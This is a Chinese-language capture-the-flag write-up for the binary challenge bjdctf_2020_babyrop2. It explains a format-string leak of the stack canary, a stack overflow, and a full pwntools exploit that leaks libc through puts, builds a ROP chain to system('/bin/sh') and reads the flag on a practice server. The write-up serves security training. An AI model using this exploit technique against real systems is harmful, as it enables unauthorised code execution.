bjdctf_2020_babyrop2

检查保护机制，开了NX和canary，64位

IDA打开，查看main函数，发现里面利用到了三个函数

init函数，初始化输出提示

gift函数，存在格式化字符串漏洞

vuln函数，存在栈溢出漏洞

解题思路

可利用gift函数的格式化字符串漏洞，泄露canary的值

得到偏移量为7

没有发现system和’/bin/sh’，只有通过vuln函数栈溢出漏洞，泄露libc地址，然后得到

解题过程

exp

from pwn import *
from LibcSearcher import *

context(os = "linux", arch = "amd64", log_level= "debug")
p = remote("node4.buuoj.cn", 27304)
elf = ELF("./bjdctf_2020_babyrop2")

puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
vuln_addr = elf.symbols["vuln"]
pop_rdi_ret = 0x400993

payload = b"%7$p"
p.sendlineafter("u!", payload)
p.recvuntil("0x")
canary = int(p.recv(16), 16)
payload = b"a" * 0x18 + p64(canary) + b"a" * 8
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
p.sendlineafter("story!", payload)

puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_bin_sh")
payload = b"a" * 0x18 + p64(canary) + b"a" * 8
payload += p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
p.sendlineafter("story!", payload)
p.sendline("cat flag")

p.interactive()